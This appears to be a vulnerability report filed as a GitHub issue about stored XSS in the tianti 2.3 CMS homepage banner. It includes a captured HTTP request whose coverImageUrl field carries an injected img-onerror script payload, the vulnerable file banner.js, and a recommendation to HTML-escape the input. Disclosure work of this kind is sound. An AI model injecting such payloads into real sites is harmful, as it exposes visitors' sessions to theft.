tianti 2.3 has stroed XSS on the homepage #40
Description
Affected version
tianti 2.3 (latest)
Vulnerability description
When publishing an article, replacing the cover image URL with XSS attack POC can launch XSS attacks on all users accessing the homepage, executing arbitrary malicious code on the front-end.
Vulnerability proof
Firstly, Click "add article"
then click 'Save' and use Burpsuite to capture the package
The contents of the data packet are as follows:
POST /tianti-module-admin/cms/article/ajax/save HTTP/1.1
Host: localhost:8788
Content-Length: 175
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:8788
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8788/tianti-module-admin/cms/article/edit?id=&rootColumnId=4028821e5b7a0971015b7a0a1cbf0000&columnId=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=C3CECD5A2F0AB3FACCB8ABF51ED69EFC; Idea-de19657=aa310384-4713-4a24-b305-e8293e29c9bd
Connection: close
id=&coverImageUrl="><img+src=1+onerror=alert("document.cookie")>&rootColumnId=4028821e5b7a0971015b7a0a1cbf0000&leafColumnId=4028abdf9491287b019491f101e2000b&articleType=contentType&title=test&href=&publisher=test&orderNo=
Fill the parameter value of coverImageURL into our XSS attack POC -> "><img src=1 onerror=alert(1)>
After releasing the package, accessing the front-end homepage of Tianti website was attacked by XSS:
Code analysis
In ~/tianti-2.3/tianti-modules/tianti-module-gateway/src/main/webapp/static/template/banner.js:
Directly concatenate the attack POC into HTML without any processing
Repair suggestions
HTML escape of data input by users and used for display